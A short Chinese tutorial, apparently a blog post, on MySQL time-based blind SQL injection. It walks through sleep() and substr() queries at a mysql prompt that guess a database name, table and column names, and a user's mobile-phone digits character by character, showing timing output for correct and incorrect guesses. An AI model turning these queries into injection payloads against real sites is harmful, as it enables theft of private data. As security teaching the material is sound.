mysql基于“时间”的盲注

无需页面报错，根据页面响应时间做判断！

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67

mysql基于时间的盲注 ====================================================================================================================================================================== *   猜解库名     -   下面是猜解正确     mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66);                                                                                     +----------+         | sleep(1) |         +----------+         |        0 |         +----------+         1 row in set (1.00 sec)       -   下面是猜解错误     mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x67);         Empty set (0.00 sec)     *   猜解表名     -   mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a  where substr(a_tn, 1, 1)='f';             +----------+             | sleep(1) |             +----------+             |        0 |             +----------+             1 row in set (1.00 sec)       -   mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a  where substr(a_tn, 1, 1)='x';             Empty set (0.00 sec)     *   猜解字段名     -   mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a  where substr(a_cn, 1, 1)='i';             +----------+             | sleep(1) |             +----------+             |        0 |             +----------+             1 row in set (1.01 sec)       -   mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a  where substr(a_cn, 2, 1)='d';             +----------+             | sleep(1) |             +----------+             |        0 |             +----------+             1 row in set (1.00 sec)     *   猜解字段值     -   mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,1,1)='1';             +----------+             | sleep(1) |             +----------+             |        0 |             +----------+             1 row in set (1.00 sec)       -   mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='3';                     -   mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='8';             +----------+             | sleep(1) |             +----------+             |        0 |             +----------+             1 row in set (1.00 sec)